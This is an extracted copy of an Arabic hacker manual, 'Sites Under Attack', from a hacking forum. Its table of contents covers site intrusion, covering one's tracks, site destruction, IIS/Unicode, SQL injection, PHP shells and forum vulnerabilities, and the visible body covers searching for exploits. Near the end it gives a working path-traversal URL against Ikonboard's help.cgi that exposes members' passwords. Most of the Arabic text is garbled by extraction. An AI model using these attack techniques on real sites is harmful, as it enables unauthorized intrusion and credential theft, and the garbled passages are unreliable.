Professional Documents
Culture Documents
com/vb
١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻮﯾﺎ ت
ﺎﻟﻤ ﺤ
ﻘـــﺪﻣـــﺔ. .١ﻣ
• ﺎﻟﻔ ﺼﻞا ﻷ و ل ))ﻣﻬﺎ را ت وﻣ ﺼﻄﻠﺤﺎ تأ ﺳﺎ ﺳﯿﺔ((
.٢ﻛﯿﻔﯿﺔاﻟﺒﺤﺚﻓﻲاﻹﻧﺘﺮﻧﺖ.
ﺋﻲ. .٣ﺎﻹﺧﺘﺮاقاﻟﻌﺸﻮا
ﻤﻮاﻗﻊ. ﻤﺜﻠﻰﻓﻲاﺧﺘﺮاقاﻟ ﻘﺔاﻟ ﺼﺤﯿﺤﺔ واﻟ .٤ﺎﻟﻄﺮﯾ
.٥ﻣﻌﻠﻮﻣﺎ ت ﻋ ﻦاﻟـ.DNS
.٦ﺷﺮح ﻣﻠ ﻒ .htaccess
ﻤﻠﻔﺎ ت .FTP ﻘﻞاﻟ .٧ﻧﻈﺎم ﻧ
.٨ﺎﻹﺧﺘﺮاق ﻋ ﻦ ﻃﺮﯾﻖ .FTP
.٩ﺑﺮ وﺗﻮﻛﻮ ل ﺧﺪﻣﺔ .Finger
.١ ٠ﺷﺮحاﻟـ .secure shell
.١ ١ﺷﺮح ﻣﻌﻨﻰاﻟـ .Buffer Overflows
.١ ٢ﺎﻟـ CGIوﻋﻼﻗﺘﻬﺎ ﺑﺎﻹﻧﺘﺮﻧﺖ.
ﻤﺎﯾﺔ وااﻟﺘﺨﻔﻲ(( • ﺎﻟﻔ ﺼﻞاﻟﺜﺎﻧﻲ))اﻟﺤ
.١ ٣ا ﻷﻣ ﻦ و)))اﻟﺘﺨﻔﻲ(((ﻓﻲاﻹﻧﺘﺮﻧﺖ.
ﻤﺎﯾﺔ ﻫﻮﯾﺘﻚﻓﻲاﻟﻨﺖ. .١ ٤ﺣ
ﻤﻲ ﻧﻔ ﺴﻚ وﻏﻄﻲاﻓﻌﺎﻟﻚ. .١ ٥ﺎﺣ
ﻤﻨﺘﺪﯾﺎ ت. ﻤﺎﯾﺔاﻟ .١ ٦ﺣ
ﺒﻜﺎ ت..١ ٧ﺄﻣ ﻦاﻟﺸ
ﻤﻮاﻗﻊ. ﺋﯿ ﻦﻓﻲاﺧﺘﺮاقاﻟ ﺒﺘﺪ ﻤ ﻤﺔ ﻟﻠ .١ ٨ﻣ ﺼﻄﻠﺤﺎ ت ﻣﻬ
ﻤﻮاﻗﻊ. .١ ٩ﺪاﯾﻨﺎﻣﯿﻜﯿﺔﺗﺪﻣﯿﺮاﻟ
ﻤﻮاﻗﻊ. .٢٠ﺷﺮح ﺑﺮﻧﺎﻣﺞاﻟﺪ رة ﻟﺘﺪﻣﯿﺮاﻟ
ﻤﻮاﻗﻊ ﺑﺪ و ن ﺑﺮاﻣﺞ. .٢١ﺗﺪﻣﯿﺮاﻟ
.٢٢ﻣﻌﻠﻮﻣﺎ ت ﻋ ﻦ .Routing in the Internet
ﻤﺔ((ﻘﺘﻄﻔﺎ ت ﻋ ﻦاﻟ ﺴﯿﺮﻓﺮا ت وا ﻷﻧﻈ • ﺎﻟﻔ ﺼﻞاﻟﺜﺎﻟﺚ))ﻣ
د )اﻟﺠﺰ ءا ﻷ و ل(. .٢٣اﻹﺧﺘﺮاق ﻋ ﻦ ﻃﺮﯾﻖاﻟﯿﻮﻧﯿﻜﻮ
د )اﻟﺠﺰ ءاﻟﺜﺎﻧﻲ(. .٢٤ﺎﻹﺧﺘﺮاق ﻋ ﻦ ﻃﺮﯾﻖاﻟﯿﻮﻧﯿﻜﻮ
د.دة ﻣ ﻦﺛﻐﺮا تاﻟﯿﻮﻧﯿﻜﻮ .٢٥ﻣﻌﻠﻮﻣﺎ ت ﻋﺎﻣﺔ ﻋ ﻦ ﻛﯿﻔﯿﺔاﻻ ﺳﺘﻔﺎ
.٢٦ﺎﻟﺪﻟﯿﻞاﻟﻜﺎﻣﻞ ﻹﺧﺘﺮاق ﺳﯿﺮﻓﺮ .IIS
ﻤﻖﻓﻲاﻟـ.UniCode .٢٧ﺪ را ﺳﺔ ﻣﻔ ﺼﻠﺔ وﺑﻌ
د. ﻤﻠﯿﺔاﻹﺧﺘﺮاق ﺑﻮا ﺳﻄﺔاﻟﯿﻮﻧﯿﻜﻮ .٢٨ﺗﺪ رﯾ ﺐ ﻋﻠﻰ ﻋ
.٢٩ﺪ ر س ﻣﻔ ﺼﻞ ﻋ ﻦاﻟﻜﻮﻛﯿﺰ.
ﻤﻮاﻗﻊاﻟﺘﻲﺗﺪﻋﻢاﻟﻔﺮ وﻧﺖ ﺑﯿﺞ. ﻤﺔ ﻋ ﻦاﻟ .٣٠ﻣﻌﻠﻮﻣﺎ ت ﻣﻬ
ﻤﻮاﻗﻊ ﺑﺜﻐﺮةاﻟﻔﺮ وﻧﺖ ﺑﯿﺞ. >) .٣١س&ج<(ﻓﻲاﺧﺘﺮاقاﻟ
ﻤﻮﻗﻊ. .٣٢ﺷﺮح ﺑﺮﻧﺎﻣﺞ Shadow Scan Securityﻟﺘﺤﻠﯿﻞاﻟ
ﻤﺔاﻟﺘﺸﻐﯿﻞ. دﻓﻲأﻧﻈ ﺒﺎ ﺳﻮ ر د ﻣﻠ ﻒاﻟ .٣٣ﺎﻣﺎﻛ ﻦ و ﺟﻮ
ﻤﻮﻗﻊ )اﻟﺠﺰ ءا ﻷ و ل(. .٣٤ﺎﺧﺘﺮاقاﻟ
ﻤﻮاﻗﻊ )اﻟﺠﺰ ءاﻟﺜﺎﻧﻲ(. .٣٥ﺎﺧﺘﺮاقاﻟ
ﻤﻮاﻗﻊ )ﻣﺘﻮ ﺳﻂ(. .٣٦ﺪ ر سﻓﻲاﺧﺘﺮاقاﻟ
.٣٧ﺎﺧﺘﺮاقاﻟـ.SQL
.٣٨ﺪ ر س ﻣﻔ ﺼﻞ ﻋ ﻦاﻟـ.SQL
ﻤﻮاﻗﻊ. .٣٩ﺪ ر س ﻹﺣﺘﺮا فاﻟﻬﺎكﻓﻲاﺧﺘﺮاقاﻟ
ﻤﻮاﻗﻊ. .٤٠ﺎ ﺳﺘﻐﻼ ل ﻟﯿﻨﻜ ﺲﻓﻲاﺧﺘﺮاقاﻟ
ﻤﻮاﻗﻊ ﻋ ﻦ ﻃﺮﯾﻖ ﻟﯿﻨﻜ ﺲ. .٤١ﺷﺮح ﻣﻔ ﺼﻞ ﻣ ﻦا ﻷﻟ ﻒ إﻟﻰاﻟﯿﺎ ءﻓﻲاﺣﺘﺮا فاﺧﺘﺮاقاﻟ
.٤٢ﺪ ر س ﻋ ﻦاﻟـ) PHP Shellاﻟﺠﺰ ءا ﻷ و ل(.
.٤٣ﺪ ر س ﻋ ﻦاﻟـ) PHP Shellاﻟﺠﺰ ءاﻟﺜﺎﻧﻲ(.
٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
.٤٤ﺪ ر س ﻋ ﻦاﻟـ) PHP Shellاﻟﺠﺰ ءاﻟﺜﺎﻟﺚ(.
داة .anmap .٤٥ﺷﺮحأ
ﻘﺔﻹﻗﺘﺤﺎماﻟ ﺴﯿﺮﻓﺮا ت ﺑﺪ و نﺛﻐﺮا ت. .٤٦ﻃﺮﯾ
.Cross Site Scripting .٤٧
دﺗﺪﻣﯿﺮ ﺳﺠﻞاﻟﺰ وا ر. .٤٨ﻛﻮ
ﺒﻪ ﻣﻔ ﺼﻞ ﻋ ﻦاﻟﺜﻐﺮا ت. .٤٩ﺷﺮح ﺷ
.٥ ٠ﻛﯿ ﻒﺗ ﺴﺘﺨﺪماﻟﺜﻐﺮا ت.
ﺋﯿﻠﯿﺔ ﻣﻊ ﻫﺬهاﻟﺜﻐﺮة. ﻤﻮاﻗﻊاﻹ ﺳﺮا ﻤﺘﻊ ﺑﺈﺧﺘﺮاقاﻟ .٥ ١ﺗ
.٥ ٢ﺛﻐﺮة ﻧﯿﻮك.
.٥ ٣ﺛﻐﺮة .Chunked
ﻤﻨﺘﺪﯾﺎ ت ﻣ ﻦ ﻧﻮ ع .vBulletin2,2,0 .٥ ٤ﺎﺧﺘﺮاقاﻟ
.٥ ٥ﺛﻐﺮةﻓﻲ ﻣﻨﺘﺪﯾﺎ ت.vBulletin 2,2,9
.٥ ٦ﺎﺧﺘﺮاق ﻣﻨﺘﺪﯾﺎ ت .phpbb 2.0.0
ﻤﻮاﻗﻊ. ﻤﯿﻠﺔﻓﻲ phpﻓﻲاﻟ .٥ ٧ﺛﻐﺮة ﺟ
.٥ ٨ﺛﻐﺮةﻓﻲ .php nuke
.٥ ٩ﺛﻐﺮهﻓﻲ .Bandmin 1.4
ﻤﻨﺘﺪﯾﺎ ت. .٦٠ﺛﻐﺮةﻓﻲ ﻧﻮ ع XMBﻣ ﻦاﻟ
.٦١ﺷﺮحﺛﻐﺮة .philboard
.٦٢ﺷﺮحﺛﻐﺮة .uploader.php
ﻤﻨﺘﺪﯾﺎ تاﻟﻌﺮﺑﯿﺔ ﻟﻠﻬﺎﻛﺮ. .٦٣ﺄﻓ ﻀﻞاﻟ
.٦٤ﺄﻓ ﻀﻞ ﻣﻮاﻗﻊا ﻷﻣ ﻦ واﻟﻬﺎكاﻹﻧﺠﻠﯿﺰﯾﺔ.
ﻤﺔ. .٦٥اﻟﺨﺎﺗ
٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊﺗ ﺤ ﺖاﻟﻬﺠﻮم Sites Under )) -- ﺘﺎباﻟﺬيا ﻃﻠﻘﻨﺎ ﻋﻠﯿﻪاﺳﻢ --ﻣﻮاوﻫﺬا ﻫﻮاﻟﺠﺰ ءاﻷو ل ﻣﻦ ﻫﺬااﻟﻜ
ﺘ ﺮا ﺣﺎﺗﻜﻢ وﻣﺎﺗﺠﻮدﺑﻪاﻧﻔﺴﻜﻢﻓﻲ ﺧﺪﻣﺔ دﯾﻨﻜﻢ ....
ﻗﺘﻈﺎرا
ﻗﺒﻮااﻟﺠﺰ ءاﻟﺜﺎﻧﻲﻗ ﺮﯾﺒﺎ وﻓﻲاﻧ
((Attackوﺗ ﺮ
ﺘﺎﺑﺎﺗﻨﺎ وﻟﻜﻦ رأﯾﻨﺎ ﻣﻦاﻻ ﺧﻮة ﻣﻤﻦﻗﺪ ﺘﺎﺑﺎﺗﻨﺎﻓﺄ ﺿﻔﻨﺎ ﻣﻮا ﺿﯿﻊ ﻣﻦﻛوﻟﻘﺪ ﻧﻮﯾﻨﺎانﺗﻜﻮناﻟﻤﻮا ﺿﯿﻊﻛﻠﻬﺎ ﻣﻦﻛ
ﺘﺒﻪﻓﻲﺑﻌ ﺾاﻟﻤﻮا ﺿﯿﻊﻟﺬﻟﻚﺗﻢارﻓﺎ ق ﺘﺒﻮهﻫﻮأﻓ ﻀ ﻞ ﻣﻤﺎ ﺳﻨﻜ ﺘﺢا ﷲ ﻋﻠﯿﻬﻢﻓﻲﺑﻌ ﺾاﻟﻤﺠﺎﻻ ت وﻣﺎﻛ ﻓ
ﺘﻌﺪﯾﻼ تاﻟﻠﻐﻮﯾﺔاواﻻ ﺧﻄﺎ ءاﻟﻮا ﺿ ﺤﺔ ..... ﺘﻌﻠ ﻖﺑﺎﻟﻣﻮا ﺿﯿﻌﻬﻢﻛﻤﺎ ﻫﻲ ﻣﻦ ﻏﯿ ﺮﺗﻌﺪﯾ ﻞاﻻ ﻣﺎ ﯾ
اذنﻓﻨﺼﯿﺒﻨﺎ ﻣﻦاﻟﻤﻮا ﺿﯿﻊ ﻣﺎ ﯾﻘﺎرب %٤٠واﻟﺒﻘﯿﺔ ﻫﻲ ﻣﻦ ﻧﺼﯿﺐا ﺧﻮاﻧﻨﺎ وﻧﺴﺎ لا ﷲﻟﻬﻢاﻻﺟ ﺮ واﻟﻤﺜﻮﺑﺔ
ﺘﻬﻢ ودﯾﻨﻬﻢاﻟﻰانﺗﻘﻮماﻟﺴﺎﻋﺔ .... ﺘﺨﺪماﻣ ﻋﻠﻰ ﻣﺎﻗﺪﻣﻮه ﻣﻦ ﻣﻌﻠﻮﻣﺎ ت ﺳ
٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
اﻟﻔ ﺼ ﻞ ا ﻷول
<><><><><><><><><><><><><><><><><><><><><>
))ﻣﻬﺎرا تو ﺻﻄﻠﺤﺎ ت
((أ ﺳﺎ ﺳﯿﺔ
٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$
ﺘﺮ
ﺎﻟﻜﺎﺗﺐ:ﺑﻼكﻫﻨ
$$$$$$$$$$$
ﺘﺎﺑﺔاﻟﻜﻠﻤﺔ ﺘﺒ ﺖ وانﻛﻨ ﺖﻗﺪأ ﺧﻄﺄ تﻓﻲﻛ ﺘﺒ ﺮهاﻟﻤ ﺤ ﺮكاﻟﺬﻛﻲﻓﻬﻮ ﯾﻌ ﺮ ف ﻣﺎذاﻛ ﺑﺎﻟﻨﺴﺒﻪ ﻣﺜﻼﻟﻠﺠﻮﺟ ﻞاﻧﺎاﻋ
ﺘﺎﺋ ﺞاﻟﺒ ﺤﺚ ﺳﺆا ل ...ﻫ ﻞاﻧ ﺖﺗﻘﺼﺪﻛﺬا ...وﻏﺎﻟﺒﺎ ﻣﺎﺗﺠﺪاﻟﺬيﻛﻨ ﺖﺗﺒ ﺤﺚ ﻓﻬﻮﺗﻠﻘﺎﺋﯿﺎ ﺳﯿﻌﻄﯿﻚﻓﻲﺑﺪاﯾﺔ ﻧ
ﺘﯿﺠﺔاﻟﺒ ﺤﺚ . ﻋﻨﻪﻓﻲاواﺋ ﻞ ﺻﻔ ﺤﺎ ت ﻧ
ﺘﻌﺎﻣ ﻞ ﺘﻲ ﯾ ﺘﺠﺎرﯾﻪاﻟ ﻗﻊاﻟﺘﺒ ﺮ ذﻛﺎ ءﺗﺠﺎري ﺣﯿﺚاﻧﻪ ﯾﻘﺪمﻟﻚاﻟﻤﻮا ﺑﺎﻟﻨﺴﺒﻪﻟﻠﯿﺎﻫﻮﻫﻮاﯾ ﻀﺎ ذﻛﻲ وﻟﻜﻦ ذﻛﺎﺋﻪ ﯾﻌ
ﻗﻊاﻟﻌﺎﻣﻪ وﻫﻲ ﻣﺎ ﺘﻌﺎﻣ ﻞ ﻣﻌﻬﺎاﻟﻤ ﺤ ﺮكﺛﻢاﻟﻤﻮاﺘﻲ ﻻ ﯾ ﺘﺠﺎرﯾﻪاﻟ ﻗﻊاﻟ ﻣﻌﻬﺎ وﻓﯿﻬﺎ ﻣﺎﻛﻨ ﺖﺗﺒ ﺤﺚ ﻋﻨﻪﺛﻢاﻟﻤﻮا
ﻛﻨ ﺖﺗﺒ ﺤﺚ ﻋﻨﻪ ......
ﺘﺪﯾﺎ تاﺟﺪاﻟﻜﺜﯿ ﺮ ﺘﺪى وﻛﺬﻟﻚﻓﻲ ﺟﻤﯿﻊاﻟﻤﻨ ﺳﺆا ل /اﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻨﺎس واﻧﺎاﻻ ﺣﻈﻬﺎﻛﺜﯿ ﺮاﻓﻤﺜﻼ ﻋﻨﺪيﻓﻲاﻟﻤﻨ
ﺘ ﺮا ق واﻻﻣﺜﻠﺔﻛﺜﯿ ﺮة .... ﻣﺜﻼ ﯾﻄﻠﺐ ﻣﺜﻼﺑ ﺮﻧﺎﻣ ﺞاﻟﺴﺐ ﺳﻔﻦ !!!!!!!!ﻟﻤﺎذ ؟ﻫﺬا ﻣﺜﺎ ل ﻋﻦأﺷﻬ ﺮﺑ ﺮﻧﺎﻣ ﺞا ﺧ
ﺘﻄﯿﻊ ﻗﻊ ﻣﻌﯿﻦاو ﻏﯿ ﺮه وﻫﻮ ﯾﺴ ﺣﺴﻨﺎ ...ﻗﻠﻲاﻧ ﺖ ﻣﺎﻟﻔ ﺮ قﺑﯿﻨﻚ وﺑﯿﻦاﻟﺸﺨ ﺺاﻟﺬيﺗﻄﻠﺐ ﻣﻨﻪﺑ ﺮﻧﺎﻣ ﺞاو ﻣﻮ
ﺘﻄﯿﻊ ؟؟؟ اﯾﺠﺎده واﻧ ﺖ ﻻﺗﺴ
ﺘﻌﺎﻣ ﻞ ﻣﻊ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚ ﺘﻤﯿﺰ ﻋﻨﻚﺑﺎﻧﻪ ﯾﺠﯿﺪاﻟ ﺻﺢ //اﻟﻔ ﺮ قﺑﯿﻨﻚ وﺑﯿﻦ ﻫﺬااﻟﺸﺨ ﺺ ..انﻫﺬااﻟﺸﺨ ﺺ ﯾ
ﻋﻠﻰ ﻋﻜﺴﻚﺗﻤﺎﻣﺎ ....
اﻻن ﺳﻨﻘﻮمﺑﺸ ﺮ حاﻟﻄ ﺮﯾﻘﺔاﻟﻤﺜﻠﻰﻟﻌﻤﻠﯿﺔاﻟﺒ ﺤﺚ :
ﻗﻊاﻟﻰ : ﻃ ﺮﯾﻘﻪﺑﺴﯿﻄﻪ ﺟﺪا وﻫﻲ ﻋﺒ ﺮﺗﻘﺴﯿﻢاﻟﻤﻮا
ﺘﻤﺔﺑﻬﺎ ﻗﻊﺗﺠﺎرﯾﻪ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻣﻮا
ﻗﻊﺑ ﺮاﻣ ﺞ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬﻤﺔﺑﻬﺎ ﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﺘﯿﻤﯿﺪﯾﺎ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻗﻊ ﻣﻠﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﻗﻊ ﺳﯿﺎﺳﯿﻪ وا ﺧﺒﺎرﯾﻪ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﻗﻊ ﻫﺎك وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﻗﻊﻛ ﺮاك وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﺘﻲ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻗﻊ ﺳﻜﯿﻮرﯾ ﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﻗﻊ ﻫﺎردوﯾ ﺮ وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻣﻮا
ﺘﻤﺔﺑﻬﺎ ﺘﺪﯾﺎ ت وﻟﻬﺎ ﻣ ﺤ ﺮﻛﺎ تﺑ ﺤﺚ ﻣﻬ ﻣﻨ
ﺘﻮﻓ ﺮ ﺟﻤﯿﻊاﻟﻤﺠﺎﻻ ت ﺿﻤﻨﻪﺗﻘ ﺮﯾﺒﺎ وﻟﺴﻮاﺑﻘﺔاﻟﻤﺸﻬﻮدﻟﻪﺑﻬﺎ ﻣﻦﻛ ﻞ واﻧﺎاﻓ ﻀ ﻞ داﺋﻤﺎ ﻣ ﺤ ﺮكﺑ ﺤﺚ ﺟﻮﺟ ﻞﻟ
ﻗﻊﻟﻜ ﻞ ﻫﻜ ﺮ .....ﻫﻜ ﺮﻓﻬﻮﺑﺎﻟﻨﺴﺒﺔﻟﻲاﻓ ﻀ ﻞ ﻣﻮ
ﻃﯿﺐاﻻناذاأرد تاﻟﺒ ﺤﺚ ﻋﻦﺑ ﺮﻧﺎﻣ ﺞ ﻣﻌﯿﻦ ﻣﺎ ﻫﻲاﻓ ﻀ ﻞ واﺳ ﺮ عاﻟﻄ ﺮ قﻟﻠﻮﺻﻮ لﻟﻬﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ؟
ﺘﺠﯿﺐ ﻋﻠﻲﺑﻬﺬااﻻﺟﺎﺑﺔ ... ﺘﺄﻛﺪﺑﺎﻧﻚﻟﻮﻓﻜ ﺮ تﻗﻠﯿﻼ ﺳ اﻧﺎ ﻣ
٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊاﻟﺒ ﺤﺚ ﻋﻦاﻟﺒ ﺮاﻣ ﺞ وأ ﺿﻊاﺳﻢاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻤﻄﻠﻮب وﻓﻲ ﻧﻬﺎﯾﺔاﺳﻢاﻟﺒ ﺮﻧﺎﻣ ﺞ أ ﺿﻊ ﺎوﻻاذﻫﺐاﻟﻰ ﻣﻮا
ﺘﺪاداﻟﺬي ﻏﺎﻟﺒﺎ ﻣﺎﺗﻜﻮن ﻋﻠﯿﻪ ﻫﺬهاﻟﺒ ﺮاﻣ ﺞ اﻻﻣ
Prog.zipأو prog.exe
ﻣﺜﻼاﻧﺎاﺑ ﺤﺚ ﻋﻦﺛﻐ ﺮهأﻋ ﺮ ف ﻧﻮﻋﻬﺎ وﻟﻜﻨﻲ ﻻأﻋ ﺮ ف ﻣﺼﺪرﻫﺎ وارﯾﺪ ﻣ ﺮﺟﻊﻟﻬﺎﻟﺰﯾﺎدةاﻻ ﻃﻼ ع ﻣﺎذاأﻓﻌ ﻞ
؟؟؟
ﺘﺼﺎرﻫﺎ XSSاو CSS ـ Cross Site Scripteواﻟﻠﻲا ﺧ ﺘﻜﻦ ﻣﺜﻼﺛﻐ ﺮا تاﻟ وﻟ
ﺘﻌﻠ ﻖ ﺘﯿﺠﺔﺑ ﺤﺚﻻﺑﺄسﺑﻬﺎ ﻋﻦ ﻛ ﻞ ﻣﺎ ﯾ ﺘﻜﻮنﻟﺪﯾﻚ ﻧ ﺘﻲاﺑ ﺤﺚ ﻋﻦﻛﻠﻤﺔ XSSﺳ ﻗﻊاﻟﺴﻜﯿﻮرﯾ اذﻫﺐاوﻻﻟﻤﻮا
ﺘﺐ xss+ exploit + bug ﺑﻬﺎ أواذﻫﺐاﻟﻰ ﺟﻮﺟ ﻞ واﻛ
ﺘﻌﻠﻘﺔﺑﻤﺎ ﻧﺒ ﺤﺚ ﻋﻨﻪﻟﺬﻟﻚ ﯾﺠﺐان ﻧ ﻀﯿ ﻖ ﻧﻄﺎ قاﻟﺒ ﺤﺚ ﻗﻊ واﻟﻤ ﺮاﺟﻊاﻟﻤ اﻟﺠﻮﺟ ﻞ ﺳﯿﻌﻄﯿﻨﺎﻛﻤﯿﺔﻛﺒﯿ ﺮ ﻣﻦاﻟﻤﻮا
ﺘ ﺤﺪﯾﺪاﻟﺒ ﺤﺚﺑﻌﻼﻣﻪ ) ( +واذاارد تﻓﻌﻠﻲاناﺑ ﺤﺚ ﻋﻦﺑﺠﺰ Bugsو ﺣﻮ لاﻟﻤﻄﻠﻮبﻓﻘﻂ وﻟﺬﻟﻚ ﻋﻠﻲﺑ
ﺘﺐ XSS+BUG+EXPLOIT : اﻛﺴﺒﻠﻮﯾ ﺖﺑﺎﺳﻢاﻟﺜﻐ ﺮه ﻓﻌﻠﻲاناﻛ
ﺘﺐ IIS+exploit+bug : ﻣﺜﻼاﺑ ﺤﺜﻌﻦ ﺛﻐ ﺮا ت IISﺳﺄﻛ
وﻫﻜﺬا
ﺘﻲﻗﺪﺗﻔﯿﺪﻛﻢﻓﻲ ﻋﻤﻠﯿﺔاﻟﺒ ﺤﺚ : ﻗﻊاﻟ اﻻن ﺳﺎ ﺿﻊﻟﻜﻢ ﻣﺠﻤﻮﻋﻪ ﻣﻦاﻟﻤﻮا
ﺘ ﺤ ﻖأﻛﺜ ﺮ
ﻗﻊﻓﻬﻮ ﯾﺴ
ﺘﻄﻠﻘﻪ ﻋﻠﻰ ﻫﺬااﻟﻤﻮ
ﺘﻗﻊﺑﺨﺎدماﻟﻬﻜ ﺮز وﺳﯿﺪاﻟﻬﻜ ﺮز وووووﻛ ﻞ ﻣﺎ ﺳ
اﻧﺎأﺳﻤﻲﻫﺬااﻟﻤﻮ
/http://www.google.com :
٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻮي ﻋﻠﻰ ﻫﺬهاﻟﻜﻠﻤﺎ تاﻟﺜﻼ ثﻓﺎنﻟﻢﻓ ﻀﻊاﻟﻤﻮﺟﻮد ﺳﻮا ء ﺘ ﺤﺴﻦانﺗﻜﻮنﺗ ﺤ ﺘﺎﺋ ﺞ ﯾﺴﻓﺎﻧﻚﺗﺨﺒ ﺮهﺑﺎناﻟﻨ
ﺘﯿﻦاوﻛﻠﻤﺔ ..ﻛﻠﻤ
ﺘﺪﯾﺎ تﻫﻜ ﺮ " ﻗﻮى ﻣﻨ "أ ** -
ﺘﺮﺗﯿﺐﻓﺎﻧﻨﺎ ﯾﺠﺐان ﻧ ﺤﺪدﻫﺎﺑﻘﻮﺳﯿﻦ ﺻﻐﯿ ﺮﯾﻦﻛﺎﻟﻤﺜﺎ لاﻟﺬي
ﻋﻨﺪاﻟﺒ ﺤﺚ ﻋﻦ ﻣﺠﻤﻮﻋﺔﻛﻠﻤﺎ ت وﺑﻨﻔ ﺲاﻟ
ﺑﻸﻋﻠﻰ ...وﻫﻜﺬا...
٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﻜﻨﺪور
$$$$$$$$$$
:
ﻗﻊﻛﺜﯿ ﺮه ﺟﺪا ﺟﺎﻫﺰه ﻗﻊ ﻋﻦﺛﻐ ﺮه ﻣ ﺤﺪده ،وﻫﺬا ﺳﻬ ﻞ وﯾﻌﻮدﺑﻤﻮا ﻫﻮاﻟﺒ ﺤﺚﻓﻲﻛﻤﯿﻪﻛﺒﯿ ﺮه ﻣﻦاﻟﻤﻮا
ـ spidersأو ﺘﻤﺪ ﻋﻠﻰاﻟ ﺘﻲﺗﻌ ﺘ ﺮا ق ،ﻣﺜﺎ لﺑﺴﯿﻂ ﺟﺪا ،رو ح ﻋﻠﻰ ﻣ ﺤ ﺮكﺑ ﺤﺚ ،ﻣﻦ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚاﻟ ﻟﻺﺧ
ﺘﺐ ) ، link:xxxx.cgi or plإرﺟﻊﻟﺸ ﺮ ح زوروﻓﻲ رﯾﺎ ﺿﯿﺎ ت اﻟﻌﻨﺎﻛﺐ ﻣﺜ ﻞ altavista.comوأﻛ
ﺘﯿﺠﻪﻟﻠﺒ ﺤﺚ ﻗﻊاﻟﻤ ﺮدودهﻟﻚ ﻧ اﻟﺒ ﺤﺚ( ﻣﺜﻼ ﻧﺒ ﺤﺚ ﻋﻦﻟﻨﻚﻟﻤﻠ ﻒﺑﺈﺳﻢ help.cgi ، link:help.cgiاﻟﻤﻮا
ﺘﺢ وا ﺣﺪ ﻣﻨﻬﺎ وأﺑ ﺤﺚﻓﻲاﻟﻤﺼﺪراﻟﻜﻮد HTMLﻋﻦاﻟﺴﻜ ﺮﺑ ﺖاﻟﺬي ﺘﺪى ، Ikonboardإﻓ ﻛﻠﻬﺎﺗﻤﻠﻚ ﻣﻨ
ﺘﻌ ﺮ فاﯾﻦ ﻣﻜﺎﻧﻪ ،ﻟﻨﻔ ﺮ ض ﻣﻜﺎﻧﻪﻫﻨﺎ http://www.example.com/cgi- ﺑ ﺤﺜ ﺖ ﻋﻨﻪ help.cgiﻟ
bin/help.cgi
ﺘﺐﺑﻌﺪاﻟﻤﻠ ﻒ ﻏﯿ ﺮاﻟﻌﻨﻮانﻟﯿﺼﺒﺢ http://www.example.com/cgi- أﻛ
bin/help.cgi?helpon=../members/[member].cgi%00
ﻣﻊ ﻣﻼ ﺣﻈﻪﺗﻐﯿﯿ ﺮ ][memberﺑﺈﺳﻢ ﻋ ﻀﻮ وﺑﺪوناﻟﻘﻮﺳﯿﻦ ][ ﻃﺒﻌﺎ
ﺘﺪى Ikonboard ـاﻟﻤﻨﺳﻮ ف ﯾﻌ ﺮ ضﻟﻚ ﻣﻌﻠﻮﻣﺎ تاﻟﻌ ﻀﻮﻛﺎﻣﻠﻪ وﻣﻦ ﻇﻤﻨﻬﺎﻛﻠﻤﺔاﻟﻤ ﺮور وﻫﺬهاﻟﺜﻐ ﺮهﻟ
2.1.7وﻫﺬاﻟﯿ ﺲﻟﺐ ﻣﻮ ﺿﻮﻋﻲ وﻟﻜﻦﻫﻲﺑﺪاﯾﻪ وﻣﺜﺎ لﻻﺗ ﺤﻔﻈﻪﻷﻧﻲأ ﺣ ﻀ ﺮ تأﺑﺴﻂ ﻣﺜﺎ لﻓﻘﻂﻓﯿﻮﺟﺪ ﻏﯿ ﺮه
ﺘﺜﻤﺎراﺗﻬﺎﺗﻜﻮن ﻣﻦ ﺧﻼ ل url ـ CGIScriptﺗﻤﻠﻚﺛﻐ ﺮا ت ﻣﺜ ﻞ ﻫﺬه واﻏﻠﺐإﺳ ﻣﺌﺎ تﺑ ﻞ آﻻ ف ﻣﻠﻔﺎ تاﻟ
